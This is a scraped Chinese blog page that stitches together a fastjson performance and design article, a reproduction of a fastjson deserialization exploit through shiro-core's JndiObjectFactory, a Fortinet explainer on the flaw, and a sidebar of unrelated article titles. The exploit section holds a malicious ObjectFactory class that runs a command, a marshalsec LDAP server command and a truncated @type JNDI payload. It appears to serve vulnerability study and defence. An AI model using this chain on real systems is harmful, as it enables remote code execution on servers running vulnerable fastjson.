JSON最佳实践 | kimmking's blog http://kimmking.github.io/2017/06/06/json-best-practice/

JSON协议使用方便,越来越流行。JSON的处理器有很多,为什么需要再写一个呢?因为我们需要一个性能很好的JSON Parser,希望JSON Parser的性能有二进制协议一样好,比如和protobuf一样,这可不容易,但确实做到了。有人认为这从原理上就是不可能的,但是计算机乃实践科学,看实际的结果比原理推导更重要。 

这篇文章告诉大家: 
* Fastjson究竟有多快 
* 为什么Fastjson这么快 
* 你能用Fastjson来做什么! 
* 如何获得fastjson? 

首先,Fastjson究竟有多快? 
我们看一下使用https://github.com/eishay/jvm-serializers/提供的程序进行测试得到的结果:

  序列化时间 反序列化时间 大小 压缩后大小
java序列化 8654 43787 889 541
hessian 6725 10460 501 313
protobuf 2964 1745 239 149
thrift 3177 1949 349 197
avro 3520 1948 221 133
json-lib 45788 149741 485 263
jackson 3052 4161 503 271
fastjson 2595 1472 468 251

这是一个468bytes的JSON Bytes测试,从测试结果来看,无论序列化和反序列化,Fastjson超越了protobuf,可以当之无愧fast! 它比java deserialize快超过30多倍,比json-lib快100倍。由于Fastjson的存在,你可以放心使用json统一协议,达到文本协议的可维护性,二进制协议的性能。 

JSON处理主要包括两个部分,serialize和deserialize。serialize就是把Java对象变成JSON String或者JSON Bytes。Deserialize是把JSON String或者Json Bytes变成java对象。其实这个过程有些JSON库是分三部分的,json string <--> json tree <--> java object。Fastjson也支持这种转换方式,但是这种转换方式因为有多余的步骤,性能不好,不推荐使用。 

为什么Fastjson能够做到这么快? 
一、Fastjson中Serialzie的优化实现 
1、自行编写类似StringBuilder的工具类SerializeWriter。 
把java对象序列化成json文本,是不可能使用字符串直接拼接的,因为这样性能很差。比字符串拼接更好的办法是使用java.lang.StringBuilder。StringBuilder虽然速度很好了,但还能够进一步提升性能的,fastjson中提供了一个类似StringBuilder的类com.alibaba.fastjson.serializer.SerializeWriter。 

SerializeWriter提供一些针对性的方法减少数组越界检查。例如public void writeIntAndChar(int i, char c) {},这样的方法一次性把两个值写到buf中去,能够减少一次越界检查。目前SerializeWriter还有一些关键的方法能够减少越界检查的,我还没实现。也就是说,如果实现了,能够进一步提升serialize的性能。 

2、使用ThreadLocal来缓存buf。 
这个办法能够减少对象分配和gc,从而提升性能。SerializeWriter中包含了一个char[] buf,每序列化一次,都要做一次分配,使用ThreadLocal优化,能够提升性能。 

3、使用asm避免反射 
获取java bean的属性值,需要调用反射,fastjson引入了asm的来避免反射导致的开销。fastjson内置的asm是基于objectweb asm 3.3.1改造的,只保留必要的部分,fastjson asm部分不到1000行代码,引入了asm的同时不导致大小变大太多。 

使用一个特殊的IdentityHashMap优化性能。 
fastjson对每种类型使用一种serializer,于是就存在class -> JavaBeanSerizlier的映射。fastjson使用IdentityHashMap而不是HashMap,避免equals操作。我们知道HashMap的算法的transfer操作,并发时可能导致死循环,但是ConcurrentHashMap比HashMap系列会慢,因为其使用volatile和lock。fastjson自己实现了一个特别的IdentityHashMap,去掉transfer操作的IdentityHashMap,能够在并发时工作,但是不会导致死循环。 

5、缺省启用sort field输出 
json的object是一种key/value结构,正常的hashmap是无序的,fastjson缺省是排序输出的,这是为deserialize优化做准备。 

6、集成jdk实现的一些优化算法 
在优化fastjson的过程中,参考了jdk内部实现的算法,比如int to char[]算法等等。 

二、fastjson的deserializer的主要优化算法 
deserializer也称为parser或者decoder,fastjson在这方面投入的优化精力最多。 
1、读取token基于预测。 
所有的parser基本上都需要做词法处理,json也不例外。fastjson词法处理的时候,使用了基于预测的优化算法。比如key之后,最大的可能是冒号":",value之后,可能是有两个,逗号","或者右括号"}"。在com.alibaba.fastjson.parser.JSONScanner中提供了这样的方法:

  1. public void nextToken(int expect) {
  2. for (;;) {
  3. switch (expect) {
  4. case JSONToken.COMMA: //
  5. if (ch == ',') {
  6. token = JSONToken.COMMA;
  7. ch = buf[++bp];
  8. return;
  9. }
  10. if (ch == '}') {
  11. token = JSONToken.RBRACE;
  12. ch = buf[++bp];
  13. return;
  14. }
  15. if (ch == ']') {
  16. token = JSONToken.RBRACKET;
  17. ch = buf[++bp];
  18. return;
  19. }
  20. if (ch == EOI) {
  21. token = JSONToken.EOF;
  22. return;
  23. }
  24. break;
  25. // ... ...
  26. }
  27. }

从上面摘抄下来的代码看,基于预测能够做更少的处理就能够读取到token。 

2、sort field fast match算法 
fastjson的serialize是按照key的顺序进行的,于是fastjson做deserializer时候,采用一种优化算法,就是假设key/value的内容是有序的,读取的时候只需要做key的匹配,而不需要把key从输入中读取出来。通过这个优化,使得fastjson在处理json文本的时候,少读取超过50%的token,这个是一个十分关键的优化算法。基于这个算法,使用asm实现,性能提升十分明显,超过300%的性能提升。

  1. { "id" : 123, "name" : "魏加流", "salary" : 56789.79}
  2. ------      --------          ----------

在上面例子看,虚线标注的三个部分是key,如果key_id、key_name、key_salary这三个key是顺序的,就可以做优化处理,这三个key不需要被读取出来,只需要比较就可以了。 

这种算法分两种模式,一种是快速模式,一种是常规模式。快速模式是假定key是顺序的,能快速处理,如果发现不能够快速处理,则退回常规模式。保证性能的同时,不会影响功能。 

在这个例子中,常规模式需要处理13个token,快速模式只需要处理6个token。 

实现sort field fast match算法的代码在这个类[com.alibaba.fastjson.parser.deserializer.ASMDeserializerFactory|http://code.alibabatech.com/svn/fastjson/trunk/fastjson/src/main/java/com/alibaba/fastjson/parser/deserializer/ASMDeserializerFactory.java],是使用asm针对每种类型的VO动态创建一个类实现的。 
这里是有一个用于演示sort field fast match算法的代码: 
http://code.alibabatech.com/svn/fastjson/trunk/fastjson/src/test/java/data/media/ImageDeserializer.java

  1. // 用于快速匹配的每个字段的前缀
  2. char[] size_   = "\"size\":".toCharArray();
  3. char[] uri_    = "\"uri\":".toCharArray();
  4. char[] titile_ = "\"title\":".toCharArray();
  5. char[] width_  = "\"width\":".toCharArray();
  6. char[] height_ = "\"height\":".toCharArray();
  7. // 保存parse开始时的lexer状态信息
  8. int mark = lexer.getBufferPosition();
  9. char mark_ch = lexer.getCurrent();
  10. int mark_token = lexer.token();
  11. int height = lexer.scanFieldInt(height_);
  12. if (lexer.matchStat == JSONScanner.NOT_MATCH) {
  13. // 退出快速模式, 进入常规模式
  14. lexer.reset(mark, mark_ch, mark_token);
  15. return (T) super.deserialze(parser, clazz);
  16. }
  17. String value = lexer.scanFieldString(size_);
  18. if (lexer.matchStat == JSONScanner.NOT_MATCH) {
  19. // 退出快速模式, 进入常规模式
  20. lexer.reset(mark, mark_ch, mark_token);
  21. return (T) super.deserialze(parser, clazz);
  22. }
  23. Size size = Size.valueOf(value);
  24. // ... ...
  25. // batch set
  26. Image image = new Image();
  27. image.setSize(size);
  28. image.setUri(uri);
  29. image.setTitle(title);
  30. image.setWidth(width);
  31. image.setHeight(height);
  32. return (T) image;

3、使用asm避免反射 
deserialize的时候,会使用asm来构造对象,并且做batch set,也就是说合并连续调用多个setter方法,而不是分散调用,这个能够提升性能。 

4、对utf-8的json bytes,针对性使用优化的版本来转换编码。 
这个类是com.alibaba.fastjson.util.UTF8Decoder,来源于JDK中的UTF8Decoder,但是它使用ThreadLocal Cache Buffer,避免转换时分配char[]的开销。 
ThreadLocal Cache的实现是这个类com.alibaba.fastjson.util.ThreadLocalCache。第一次1k,如果不够,会增长,最多增长到128k。

  1. //代码摘抄自com.alibaba.fastjson.JSON
  2. public static final <T> T parseObject(byte[] input, int off, int len, CharsetDecoder charsetDecoder, Type clazz,
  3. Feature... features) {
  4. charsetDecoder.reset();
  5. int scaleLength = (int) (len * (double) charsetDecoder.maxCharsPerByte());
  6. char[] chars = ThreadLocalCache.getChars(scaleLength); // 使用ThreadLocalCache,避免频繁分配内存
  7. ByteBuffer byteBuf = ByteBuffer.wrap(input, off, len);
  8. CharBuffer charByte = CharBuffer.wrap(chars);
  9. IOUtils.decode(charsetDecoder, byteBuf, charByte);
  10. int position = charByte.position();
  11. return (T) parseObject(chars, position, clazz, features);
  12. }

6、symbolTable算法。 
我们看xml或者javac的parser实现,经常会看到有一个这样的东西symbol table,它就是把一些经常使用的关键字缓存起来,在遍历char[]的时候,同时把hash计算好,通过这个hash值在hashtable中来获取缓存好的symbol,避免创建新的字符串对象。这种优化在fastjson里面用在key的读取,以及enum value的读取。这是也是parse性能优化的关键算法之一。 

以下是摘抄自JSONScanner类中的代码,这段代码用于读取类型为enum的value。

  1. int hash = 0;
  2. for (;;) {
  3. ch = buf[index++];
  4. if (ch == '\"') {
  5. bp = index;
  6. this.ch = ch = buf[bp];
  7. strVal = symbolTable.addSymbol(buf, start, index - start - 1, hash); // 通过symbolTable来获得缓存好的symbol,包括fieldName、enumValue
  8. break;
  9. }
  10. hash = 31 * hash + ch; // 在token scan的过程中计算好hash
  11. // ... ...
  12. }

我们能用fastjson来作什么? 
1、替换其他所有的json库,java世界里没有其他的json库能够和fastjson可相比了。 
2、使用fastjson的序列化和反序列化替换java serialize,java serialize不单性能慢,而且体制大。 
3、使用fastjson替换hessian,json协议和hessian协议大小差不多一样,而且fastjson性能优越,10倍于hessian 
4、把fastjson用于memached缓存对象数据。 

如何获得fastjson 
h3. 官方网站 
Fastjson是开源的,基于Apache 2.0协议。你可以在官方网站了解最新信息。 
http://code.alibabatech.com/wiki/display/FastJSON/Home 

maven用户 
* Maven仓库 http://code.alibabatech.com/mvn/releases/ 
{code} 
<dependency> 
     <groupId>com.alibaba</groupId> 
     <artifactId>fastjson</artifactId> 
     <version>1.1.2</version> 
</dependency> 
{code} 

 
 
 
https://mp.weixin.qq.com/s/O90M916ksZ_Jld9qtr9_-A

fastjson反序列化漏洞最新gadget-shiro-core

原创 帅气的Jumbo 中国白客联盟 2020-03-14

首先,这个漏洞需要开启autotype,属于黑名单的绕过。

fastjson反序列化漏洞具体原理就不多说了,可以简单理解为可以设置type调用任意类,并为其设置属性值。

看到360cert文章提到jackson-databind多了个新的黑名单,在shiro-core包中,但是poc打码了,因此我们来简单复现下。

我们利用maven下载fastjson最新版1.2.66和shiro-core

        <dependency>            <groupId>com.alibaba</groupId>            <artifactId>fastjson</artifactId>            <version>1.2.66</version>        </dependency>
        <dependency>            <groupId>org.apache.shiro</groupId>            <artifactId>shiro-core</artifactId>            <version>1.5.1</version>        </dependency>

然后我们在shiro-core包中寻找可能触发jndi注入的地方,一般咱们寻找lookup

找到JndiObjectFactory

尝试构造poc。

借助JNDI-Exploit-Bypass-Demo先写个简单的恶意类:

import javax.naming.Context;import javax.naming.Name;import javax.naming.spi.ObjectFactory;import java.io.*;import java.util.Hashtable;
public class Exploit implements ObjectFactory {
public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) { try { Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator"); } catch (IOException e) { e.printStackTrace(); } return null; }}

marshalsec开启监听:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8090/#Exploit

把生成的Exploit.class放在8090端口下的web目录。

poc:

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://127

 
 
 https://mp.weixin.qq.com/s/ctcFje4gxjHQnUUExY1eUw

威胁研究 | Fastjson 最新反序列化漏洞复现与防御指南

Fortinet D-Team Fortinet防特网 2020-07-31

FastJson漏洞原理

通过Fastjson反序列化漏洞,攻击者可以传入一个恶意构造的JSON内容,程序对其进行反序列化后得到恶意类并执行了恶意类中的恶意函数,进而导致代码执行。

那么,如何才能够反序列化出恶意类呢?

例如代码写Object o = JSON.parseObject(poc,Object.class)就可以反序列化出Object类或其任意子类,而Object又是任意类的父类,所以就可以反序列化出所有类。

接着,如何才能触发反序列化得到的恶意类中的恶意函数呢?

在某些情况下进行反序列化时会将反序列化得到的类的构造函数、getter方法、setter方法执行一遍,如果这三种方法中存在危险操作,则可能导致反序列化漏洞的存在。换句话说,就是攻击者传入要进行反序列化的类中的构造函数、getter方法、setter方法中要存在漏洞才能触发。

漏洞原理总结

    • 若反序列化指定类型的类如“Student obj = JSON.parseObject(text, Student.class);”,该类本身的构造函数、setter方法、getter方法存在危险操作,则存在Fastjson反序列化漏洞;

    • 若反序列化未指定类型的类如“Object obj = JSON.parseObject(text, Object.class);”,该若该类的子类的构造方法、setter方法、getter方法存在危险操作,则存在Fastjson反序列化漏洞。

 
 
 
 
 
 
 
 
 
 

最新文章

  1. android之android.intent.category.DEFAULT的用途和使用
  2. webStorm破解说明
  3. P6 Professional Installation and Configuration Guide (Microsoft SQL Server Database) 16 R1
  4. 实现ScrollView中包含ListView,动态设置ListView的高度
  5. 无法找到类:java.lang.ClassNotFoundException: com.mysql.jdbc.driver
  6. Oracle表空间传输测试
  7. (转) c# ExecuteNonQuery() 返回值 -1
  8. 寻找失踪的整数数组(Find the missing integer)
  9. gif-drawable的使用及详解
  10. MyEclipse去除网上复制下来的代码带有的行号
  11. [译]ASP.NET Core 2.0 网址重定向
  12. 【算法】BILSTM+CRF中的条件随机场
  13. apk公钥私钥用法
  14. REST-framework快速构建API--源码解析
  15. HDU2029:Palindromes _easy version
  16. 配置 SQL Server 2008 Email 发送以及 Job 的 Notification通知功能
  17. k8s实战读书笔记
  18. ScriptableObjec 的简单使用
  19. APP接口
  20. OGG-01389 File header failed to parse tokens.

热门文章

  1. java 字符串String.intern()方法学习
  2. JustAuth 1.15.9 版发布,支持飞书、喜马拉雅、企业微信网页登录
  3. Node 跨域问题 Access to XMLHttpRequest at &#39;http://localhost:8080/api/user/login&#39; from origin &#39;http://localhost:808
  4. Spark RDD批量写入Hbase
  5. 杭电OJ2005---第几天?(c++)
  6. transmission protocol
  7. 剑指Offer-连续子数组中的最大和
  8. React &amp; Vue2 Butterfly图编排——让数据更自由地驱动DAG
  9. 【Java】变量
  10. 【Java】面向对象 - 封装